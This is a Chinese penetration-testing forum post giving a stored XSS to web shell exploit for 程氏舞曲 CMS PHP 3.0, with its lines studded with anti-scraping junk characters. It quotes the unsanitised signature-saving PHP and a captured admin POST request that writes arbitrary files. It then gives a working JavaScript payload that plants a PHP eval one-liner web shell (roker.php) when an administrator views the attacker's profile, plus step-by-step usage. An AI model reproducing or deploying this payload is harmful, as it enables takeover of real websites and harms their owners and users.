中国网络渗透测试联盟

标题: 程氏舞曲CMSPHP3.0 储存型xss getshell [打印本页]
作者: admin    时间: 2013-11-6 18:09
标题: 程氏舞曲CMSPHP3.0 储存型xss getshell
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
( `/ J, Y3 O( ~- c0 _$ N官网已经修补了,所以重新下了源码
% l! h) k9 A# i因为 后台登入 还需要认证码 所以 注入就没看了。
6 q% F3 o0 b7 D- O存在 xss
; u( K7 }- B+ b漏洞文件 user/member/skin_edit.php
( D& A7 V1 ]  R5 g本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:0 q0 X. I2 F- O% ^7 h" j3 i( m
  # a* Y8 x! |, E. \+ v2 B4 P
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>0 \5 \4 o* g) A; r4 v8 R
  $ {: S/ K/ u) J* Y0 F9 |1 q
</textarea></td></tr>
* [1 @& Q. j4 |+ K( c  
9 N" b: P& P3 k9 E4 f3 o0 Q             user/do.php
, R0 p' t- P: w3 o6 C* ^! s* ?, Q; |, C; r

: ?1 }( r& ]2 ]' Vif($op=='zl'){ //资料2 s9 N4 [& Q* R0 E- z5 e, {% U
  
8 i8 S6 g3 E% E, S7 d/ Z             if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) % V+ [* c% Q: e/ T
             exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
" F9 o( Z. z4 V9 ]/ C) m9 r5 Q, }4 M  % N" k5 M' }9 `7 @3 H
             $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
$ y$ B0 w  B5 A( H: J4 q  ) M6 `# B, l: {3 a
             CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
  @$ c) t; V5 D( e" ~% M0 e0 f, M             where CS_Name='".$cscms_name."'";
3 d! F. U, P8 g; P$ N  / K" o# u1 V' X# A! |: w" r
             if($db->query($sql)){& v$ j/ @8 k, i/ g0 [
  5 E6 {; d$ |6 `; q
              exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));3 I; k- h; k% h7 d8 C
  
: a- v# D8 h* R$ _4 a             }else{
9 w* R" K; A% K: j7 G- S  . e% e8 C* {7 S: i) B. g+ G- J3 ^
              exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
0 r. A: H4 N* [' l  2 q8 V* q# l2 B) E* ^, C
             }0 K! |3 s5 K% `. M4 F/ e. M0 M, K
& @+ Q, H, H% d8 s, Z3 q
: ?2 n2 K- ~# I& ?3 q, b$ u
没有 过滤导致xss产生。" ]0 R- B5 A* i8 ~9 r( H
后台 看了下 很奇葩的是可以写任意格式文件。。  i/ `0 j: p7 C" |# K7 `  }
抓包。。
/ s3 _8 d# h8 e' }& s0 M, r; f. I  X$ ^/ v

) I2 p7 a: F" V- J本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1! w5 J, ?  f, g: k
    s2 D8 s' s) }# \5 z
Accept: text/html, application/xhtml+xml, */*
9 @6 n, @5 h6 R3 t3 P+ T; [  
' m0 [; W$ \+ B0 ]/ F; K' U6 gReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php( p) ]" X7 t  r3 p% `7 q/ u  c
  7 V0 o  a' m3 P2 V+ B; l
Accept-Language: zh-CN
! R$ F% P/ I6 `$ R$ u  ( c2 U( U7 }. d# W% A: A- r- u3 `
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
6 ^  k" e7 ?) U  ' V. \7 {) `7 E/ H8 G; u
Content-Type: application/x-www-form-urlencoded% U( |& k9 n2 ?( a
  
6 o' Q, e9 B- r) V2 n! uAccept-Encoding: gzip, deflate2 m$ a* H1 U  h( t
  & p8 ~0 U* `( z+ h" ~
Host: 127.0.0.1
3 {# Q0 Z: M* z& v, Q  
1 q: R6 [# _/ B- Q, S) UContent-Length: 38- _6 J6 U, i. z9 i7 @
  9 _3 f. v& c7 E; q  K
DNT: 1
) z6 ~7 [, T& ?$ B  
: X2 p: D+ j: ~+ \" C* qConnection: Keep-Alive3 X& r" b& T% f
  
! N$ f9 m- T0 l# r0 z8 J, N' BCache-Control: no-cache* d% p6 c/ r1 m8 z: P4 n& F5 X
  
6 ~$ C' y  E( zCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
4 k" d+ a3 b6 r0 u9 Z' ?7 ]% u  
* s: h1 E' ]* R% m4 B  L" D' c$ ]
- O2 @# l( l; x# H8 ?name=aaa.php&content=%3Cs%3E%3Ca%25%3E, a; E+ r2 E) c3 L4 h' i
7 R+ p- [6 B0 V9 @3 c
3 K0 U8 `  X8 P% M6 v0 {/ _, U

' t5 W/ {5 u& u1 S于是 构造js如下。
; `  }% T( K- J2 z5 z3 P
1 g# U  O4 R) b本帖隐藏的内容<script> # Z. W7 q" W7 I1 f, U- A8 V  O
thisTHost = top.location.hostname;4 b* p& u0 D6 l  \" |
  
/ d! T) U6 U3 X! ethisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";- \8 b9 P0 T5 b. ^3 ~9 q
  
* x: @3 J$ ^' {function PostSubmit(url, data, msg) { 8 i. X) @$ s/ ^' [4 a  ?
    var postUrl = url;" [# e; M$ o" [* B3 d8 L3 q
  9 }  g& d+ R! F: f! e( U2 G9 a. z
    var postData = data; 9 R3 k) b) y+ v  }: }
    var msgData = msg; - ^# l! {$ o& F
    var ExportForm = document.createElement("FORM");
8 S0 |7 ~; E& Q8 ~; D    document.body.appendChild(ExportForm); / Q: |0 O) m& u$ f9 ^( s
    ExportForm.method = "POST"; % V* ~$ W7 j" K1 x2 }& p
    var newElement = document.createElement("input");
% u& _' M- w/ S" q    newElement.setAttribute("name", "name"); 1 q6 T4 r* J! p) b# j1 R7 L4 U( E
    newElement.setAttribute("type", "hidden"); : ^" \+ j! b& Q
    var newElement2 = document.createElement("input");
; \7 ?0 Y8 V. a1 N( o3 [2 b8 P    newElement2.setAttribute("name", "content");
* K7 |+ H  B  C$ ?4 r* q    newElement2.setAttribute("type", "hidden"); . {) ^9 Z: k+ g3 c; C
    ExportForm.appendChild(newElement);
' }6 e# W$ [: \: b$ w    ExportForm.appendChild(newElement2);
& f. G7 u8 I' U" d2 \$ R) V    newElement.value = postData;
, b7 x3 m/ I+ @/ p, o- w! `6 V2 ~    newElement2.value = msgData; : d5 T3 }+ j: b
    ExportForm.action = postUrl;
0 l0 o7 W7 N4 Z% K0 A    ExportForm.submit(); " o  I+ o4 w" Q* q
};0 J  L- d* h3 P2 g. L
  
- P* e5 {0 H, t1 B4 J  WPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
, n8 m" t2 b: q4 M1 V  
8 L' o. i( O$ d5 T. p</script>4 d* b* v1 R4 s

" T" e1 H/ J* y) _7 ^  \5 |9 c* }' _

% v/ ?: e2 N( p  B: xhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
# D$ U- R/ l4 x. n用你的账号给管理写个 私信 或者让他访问  你的主页http://127.0.0.1/home/?uid=2(uid自己改)8 A8 \" |* ]/ R$ H0 U6 z2 P
就会 在 skins\index\html\目录下生成 roker.php 一句话。
. `$ A8 D) I. D* s




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2